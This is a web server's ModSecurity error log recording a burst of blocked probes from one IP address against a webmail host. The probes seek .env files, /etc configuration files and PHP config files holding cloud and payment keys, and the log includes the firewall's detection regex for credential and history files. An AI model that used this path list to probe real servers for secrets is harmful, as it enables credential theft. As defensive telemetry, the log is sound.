[Tue May 26 13:30:17.868956 2026] [security2:error] [pid 512745:tid 512946] [client 45.148.10.95:19516] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/config/.env"] [unique_id "ahVTEXKSB_s2CvZg7xNtjgAAAVE"]
[Tue May 26 13:30:17.905195 2026] [security2:error] [pid 512745:tid 512949] [client 45.148.10.95:19318] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/config/aws.php"] [unique_id "ahVTEXKSB_s2CvZg7xNtkQAAAVQ"]
[Tue May 26 13:30:17.945180 2026] [security2:error] [pid 512745:tid 512968] [client 45.148.10.95:19476] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/config/config.inc.php"] [unique_id "ahVTEXKSB_s2CvZg7xNtkwAAAWc"]
[Tue May 26 13:30:17.971086 2026] [security2:error] [pid 512344:tid 512588] [client 45.148.10.95:19458] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/config/config.php"] [unique_id "ahVTEcbElyei4S77DQcGhAAAAHI"]
[Tue May 26 13:30:18.018688 2026] [security2:error] [pid 512745:tid 512958] [client 45.148.10.95:19280] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/config/env.php"] [unique_id "ahVTEnKSB_s2CvZg7xNtmwAAAV0"]
[Tue May 26 13:30:18.057381 2026] [security2:error] [pid 512745:tid 512883] [client 45.148.10.95:19390] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/config/module.config.php"] [unique_id "ahVTEnKSB_s2CvZg7xNtngAAARI"]
[Tue May 26 13:30:18.069113 2026] [security2:error] [pid 512745:tid 512934] [client 45.148.10.95:19594] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/config/nexmo.php"] [unique_id "ahVTEnKSB_s2CvZg7xNtnwAAAUU"]
[Tue May 26 13:30:18.112521 2026] [security2:error] [pid 512745:tid 512979] [client 45.148.10.95:19448] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/config/stripe.php"] [unique_id "ahVTEnKSB_s2CvZg7xNtoQAAAXI"]
[Tue May 26 13:30:18.332175 2026] [security2:error] [pid 512745:tid 512880] [client 45.148.10.95:19486] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/crm/.env"] [unique_id "ahVTEnKSB_s2CvZg7xNtrgAAAQ8"]
[Tue May 26 13:30:18.337809 2026] [security2:error] [pid 512745:tid 512918] [client 45.148.10.95:19516] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/cron/.env"] [unique_id "ahVTEnKSB_s2CvZg7xNtrwAAATU"]
[Tue May 26 13:30:18.347238 2026] [security2:error] [pid 512344:tid 512562] [client 45.148.10.95:19552] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/current/.env"] [unique_id "ahVTEsbElyei4S77DQcGlwAAAFg"]
[Tue May 26 13:30:18.353480 2026] [security2:error] [pid 512745:tid 512881] [client 45.148.10.95:19546] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/demo/.env"] [unique_id "ahVTEnKSB_s2CvZg7xNtsQAAARA"]
[Tue May 26 13:30:18.367258 2026] [security2:error] [pid 512745:tid 512956] [client 45.148.10.95:19362] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/dev/.env"] [unique_id "ahVTEnKSB_s2CvZg7xNtsgAAAVs"]
[Tue May 26 13:30:18.389605 2026] [security2:error] [pid 512344:tid 512552] [client 45.148.10.95:19334] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/develop/.env"] [unique_id "ahVTEsbElyei4S77DQcGmQAAAE4"]
[Tue May 26 13:30:18.396228 2026] [security2:error] [pid 512344:tid 512529] [client 45.148.10.95:19274] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/developer/.env"] [unique_id "ahVTEsbElyei4S77DQcGmgAAADc"]
[Tue May 26 13:30:18.412058 2026] [security2:error] [pid 512344:tid 512555] [client 45.148.10.95:19394] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/development/.env"] [unique_id "ahVTEsbElyei4S77DQcGmwAAAFE"]
[Tue May 26 13:30:18.525600 2026] [security2:error] [pid 512344:tid 512515] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTEsbElyei4S77DQcGjQAAACk"]
[Tue May 26 13:30:18.596214 2026] [security2:error] [pid 512344:tid 512476] [client 45.148.10.95:19582] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/erp/.env"] [unique_id "ahVTEsbElyei4S77DQcGqgAAAAI"]
[Tue May 26 13:30:18.598560 2026] [security2:error] [pid 512344:tid 512505] [client 45.148.10.95:19544] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/etc/apache2/apache2.conf"] [unique_id "ahVTEsbElyei4S77DQcGqwAAAB8"]
[Tue May 26 13:30:18.610252 2026] [security2:error] [pid 512745:tid 512975] [client 45.148.10.95:19608] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/etc/boto.cfg"] [unique_id "ahVTEnKSB_s2CvZg7xNtwAAAAW4"]
[Tue May 26 13:30:18.641902 2026] [security2:error] [pid 512745:tid 512933] [client 45.148.10.95:19294] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/fe/.env"] [unique_id "ahVTEnKSB_s2CvZg7xNtwQAAAUQ"]
[Tue May 26 13:30:18.676302 2026] [security2:error] [pid 512745:tid 512987] [client 45.148.10.95:19362] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/front/.env"] [unique_id "ahVTEnKSB_s2CvZg7xNtxQAAAXo"]
[Tue May 26 13:30:18.682499 2026] [security2:error] [pid 512344:tid 512491] [client 45.148.10.95:19548] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/frontend/.env"] [unique_id "ahVTEsbElyei4S77DQcGrQAAABE"]
[Tue May 26 13:30:18.744228 2026] [security2:error] [pid 512745:tid 512889] [client 45.148.10.95:19566] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/info.php"] [unique_id "ahVTEnKSB_s2CvZg7xNtyAAAARg"]
[Tue May 26 13:30:18.760295 2026] [security2:error] [pid 512745:tid 512914] [client 45.148.10.95:19608] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/infophp.php"] [unique_id "ahVTEnKSB_s2CvZg7xNtygAAATE"]
[Tue May 26 13:30:18.795964 2026] [security2:error] [pid 512745:tid 512877] [client 45.148.10.95:19294] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/infos.php"] [unique_id "ahVTEnKSB_s2CvZg7xNtywAAAQw"]
[Tue May 26 13:30:18.824297 2026] [security2:error] [pid 512745:tid 512992] [client 45.148.10.95:19362] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/lms/.env"] [unique_id "ahVTEnKSB_s2CvZg7xNtzgAAAX8"]
[Tue May 26 13:30:18.824753 2026] [security2:error] [pid 512745:tid 512951] [client 45.148.10.95:19516] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/laravel/.env"] [unique_id "ahVTEnKSB_s2CvZg7xNtzQAAAVY"]
[Tue May 26 13:30:18.831264 2026] [security2:error] [pid 512344:tid 512500] [client 45.148.10.95:19548] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/local/.env"] [unique_id "ahVTEsbElyei4S77DQcGtgAAABo"]
[Tue May 26 13:30:18.874151 2026] [security2:error] [pid 512745:tid 512922] [client 45.148.10.95:19452] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/market/.env"] [unique_id "ahVTEnKSB_s2CvZg7xNt0QAAATk"]
[Tue May 26 13:30:18.887522 2026] [security2:error] [pid 512344:tid 512571] [client 45.148.10.95:19394] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/marketing/.env"] [unique_id "ahVTEsbElyei4S77DQcGuQAAAGE"]
[Tue May 26 13:30:18.906214 2026] [security2:error] [pid 512344:tid 512508] [client 45.148.10.95:19582] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/media/.env"] [unique_id "ahVTEsbElyei4S77DQcGugAAACI"]
[Tue May 26 13:30:18.972583 2026] [security2:error] [pid 512745:tid 512898] [client 45.148.10.95:19486] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/node-api/.env"] [unique_id "ahVTEnKSB_s2CvZg7xNt1AAAASE"]
[Tue May 26 13:30:18.972798 2026] [security2:error] [pid 512745:tid 512925] [client 45.148.10.95:19516] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/new/.env"] [unique_id "ahVTEnKSB_s2CvZg7xNt1QAAATw"]
[Tue May 26 13:30:18.974535 2026] [security2:error] [pid 512344:tid 512598] [client 45.148.10.95:19552] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/node/.env"] [unique_id "ahVTEsbElyei4S77DQcGvQAAAHw"]
[Tue May 26 13:30:18.975744 2026] [security2:error] [pid 512745:tid 512970] [client 45.148.10.95:19362] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/node/api/.env"] [unique_id "ahVTEnKSB_s2CvZg7xNt1gAAAWk"]
[Tue May 26 13:30:18.978788 2026] [security2:error] [pid 512344:tid 512540] [client 45.148.10.95:19548] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/node/backend/.env"] [unique_id "ahVTEsbElyei4S77DQcGvgAAAEI"]
[Tue May 26 13:30:18.980718 2026] [security2:error] [pid 512745:tid 512919] [client 45.148.10.95:19546] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/nodeapi/.env"] [unique_id "ahVTEnKSB_s2CvZg7xNt1wAAATY"]
[Tue May 26 13:30:18.999405 2026] [security2:error] [pid 512745:tid 512944] [client 45.148.10.95:19468] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/nodeweb/.env"] [unique_id "ahVTEnKSB_s2CvZg7xNt2AAAAU8"]
[Tue May 26 13:30:19.038336 2026] [security2:error] [pid 512344:tid 512503] [client 45.148.10.95:19394] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/old/.env"] [unique_id "ahVTE8bElyei4S77DQcGwQAAAB0"]
[Tue May 26 13:30:19.066731 2026] [security2:error] [pid 512745:tid 512985] [client 45.148.10.95:19522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/opt/.env"] [unique_id "ahVTE3KSB_s2CvZg7xNt4AAAAXg"]
